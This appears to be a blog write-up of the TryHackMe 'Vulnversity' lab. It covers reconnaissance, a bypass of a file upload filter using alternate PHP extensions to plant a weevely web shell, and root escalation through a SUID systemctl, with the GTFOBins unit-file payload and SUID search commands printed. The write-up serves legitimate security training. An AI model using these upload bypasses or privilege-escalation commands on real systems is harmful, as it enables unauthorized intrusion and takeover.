Open in app

Sign in

Write

Sign in

Vulnversity : TryHackMe Writeup

0liverFlow
9 min readJan 16, 2024

--

Vulnversity

In this room, we are going to dive into :

  • Performing active reconnaissance.
  • Exploiting a file upload vulnerability.
  • Escalating our privileges by exploiting misconfigured SUID binaries.

Setup

Reconnaissance

Nmap Scan

Nmap scan

We found 6 open ports.

Let’s now carry out a service enumeration. For that, we are going to focus on the most commonly exploited ports.

Service Enumeration

FTP

In the scanning phase, we found that port 21 was open.

Moreover we got information regarding the type of FTP server being used as well as its version (vsftpd 3.0.3).

With that said, let’s check if this version is vulnerable using searchsploit :

Vulnerability Research

After a quick search, we found that this version is vulnerable to a DoS attack. However, this is not handy in our case see that we’re looking for a way to get access to the system. A Remote Code Excecution (RCE) would have been more suitable.

Let’s now check the SMB port.

SMB

SMB is often used by attackers to find sensitive information. This is because the shares can sometimes host useful information.

To enumerate the shares, we’re going to use a tool called enum4linux :

Users and Shares Enumeration

Let’s break down the command above :

-U : enumerate the users

-S : enumerate the shares

Unfortunately, we only found default shares such as print$ and IPC$.

Moreover, they are not accessible. Subsequently we can’t do anything, but to move on to the next service which is http.

HTTP (tcp/3333)

First of all, let’s go to the website using our web browser.

Vuln university main page

As you may notice, this website seems to be under development. Indeed, the buttons are not browsable.

In that case, we’re going to perform a directory busting using a tool called dirb :

Directory Busting

We found 6 directories and 3 files.

After taking a close look at the output, we can notice that /server-status file is not accessible (http response code 403 returned).

Therefore, let’s browse http://vulnversity.thm:3333/internal/index.php :

/internal/index.php

Interesting ! We have the ability to upload a file on the server. Let’s check if we can take advantage of that to upload a malicious php script on the web server.

What is the directory that has an upload form page?

Exploitation

Here, we’re going to use weevely to generate a web shell :

Generating a web shell with weevely

Let’s now upload error.php on the web server :

Extension not allowed

As you can see, we got the message “Extension not allowed”.

This is where things become interesting. In fact, we need to find a way to bypass this filter in order to upload our web shell.

What common file type you’d want to upload to exploit the server is blocked? Try a couple to find out.

FYI, here are other valid php extensions that should normally get executed properly on the web server in addition to .php :

.php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module.

Therefore, one way to try to bypass the filter will be to test each of these extensions. It will take ages if manually done. See that time is a precious asset for us, we’re going to use a tool called Burp Suite.

However, before jumping directly to the attack, let’s save the extensions above in a file.

php extensions

Once done, let’s download and configure a browser extension called FoxyProxy which is an open source proxy management tool.

After that, we can launch Burp Suite, then try to intercept the request.

Note 📝: Make sure that you switched “intercept is off” to “intercept is on” in Burp Proxy.

Intercepting request with Burp Proxy

Well, we’re going to send now the intercepted request to Intruder, then configure the payload position :

Configuring the payload position

After that, we need to load our list of php extensions from the php_extensions.txt file :

Loading php extensions

Once done, let’s finally make a last configuration before launching the attack :

Sending the request to repeater

The image above confirms that the server returns indeed the message “Extension not allowed” when the file is not accepted.

Therefore, we will configure a feature called “Grep — Match” in the Options tab. This will help us to quickly know which extension bypassed the file filter applied by the web server :

Configuring the Grep-Match feature

Great! Let’s now launch the attack :

Running the snipper attack

As you can see, it seems that error.phtml has been able to bypass the server upload filter. This can be confirmed by taking a look at the length tab as well as the “Extension not allowed” tab.

Let’s first rename the error.php file to error.phtml :

Renaming .php file to .phtml

Then, let’s try to upload the renamed file to the server and see what we get :

Uploading error.phtml

Fantastic, it works!

A good question that you may ask yourself is to know where the uploaded files are stored ?

Indeed, if you remembered very well, we found a directory /internal/uploads during the directory busting phase. This is probably where our uploaded files are stored, let’s check it :

Uploads directory

Wonderful! We can now get our shell using weevely as follows :

Shell obtained

Hoorah \0/, we got the shell.

One task to complete after getting a reverse shell consists of enumerating the users on the target system :

Enumerating users

What is the name of the user who manages the webserver?

What is the user flag?

user.txt flag

It’s time now to escalate our privileges.

Post-Exploitation

Privilege Escalation

There are several ways to escalate our privileges on a Linux system. One way of doing that consists of leveraging binaries with the SUID bit set.

Indeed, SUID (set owner userId upon execution) is a particular type of file permission given to a file. SUID gives temporary permissions to a user to run the program/file with the permission of the file owner (rather than the user who runs it).

For example, the binary file to change your password has the SUID bit set on it (/usr/bin/passwd). This is because to change your password; it will need to write to the shadowers file that you do not have access to, root does; so it has root privileges to make the right changes.

SUID illustration

Let’s now search for all SUID files on the compromised system. For that, we can use one of the following commands :

find / -user root -type f -perm -u=s 2>/dev/null
find / -user root -type f -perm -4000 2>/dev/null
Finding binaries with the SUID bit set

Hmmm, the /bin/systemctl seems to be an uncommon binary with the suid bit set.

Let’s check if we can leverage that to escalate our privileges. For that, we’re going to use a website called GTFOBins.

Checking GTFOBins for systemctl suid privesc
Explanation about how to exploit systemctl suid bit

Here, we’re just going to copy the code above, then edit the ExecStart option with “chmod u+s /bin/bash” :

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod u+s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF

Great! The suid bit has been set for the /bin/bash binary which means that we can obtain a root shell.

For that, we need to run bash -p command :

root.txt flag

Bonus

Another way to find custom binaries with suid bit set would have consisted of using a tool called SUID3ENUM. This tool will perform the following tasks :

  • List all default SUID binaries
  • List all custom binaries
  • List all custom binaries found in GTFO Bin’s
  • Printing binaries and their related exploit
  • Try and exploit found custom SUID binaries which won’t impact machine’s files (if the -e flag is specified)

Let’s give it a shot :

On the target machine, we’re going to create a directory in /tmp called SUID3NUM, then run the following command :

wget -nd -r http://10.10.81.177:8000/SUID3NUM

Once done, let’s execute the script :

Manual Exploit

Awesome! SUID3NUM was able to find the custom suid binary (/bin/systemctl) with its related GTFOBins link. Furthermore, it also provides us with the exploit directly. Therefore, there’s no need for us to go to the GTFOBins website to retrieve the exploit.

After that, all you need to do is to copy and edit the exploit like we did earlier above, then get your bash shell with root privileges.

Mission accomplished

Wrapping Up

Kudos guys for completing this room 👏.

Do not forget to click on the little clap icon below if you enjoyed the writeup and to subscribe to my newsletter to keep up with my latest articles.

References

https://medium.com/tech-zoom/dirb-a-web-content-scanner-bc9cba624c86
https://null-byte.wonderhowto.com/how-to/enumerate-smb-with-enum4linux-smbclient-0198049/
https://book.hacktricks.xyz/pentesting-web/file-upload
https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/file-upload/alt-extensions-php.txt
https://gtfobins.github.io/gtfobins/systemctl/#suid
https://github.com/Anon-Exploiter/SUID3NUM

Contact

LinkedIn : https://www.linkedin.com/in/konateolivier/

GitHub : https://github.com/0liverFlow

Tryhackme
Ctf
Vulnversity
Pentesting
Tryhackme Writeup

--

--

0liverFlow
0liverFlow

Written by 0liverFlow

144 Followers
3 Following

Pentester | Enjoy breaking and building stuffs

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams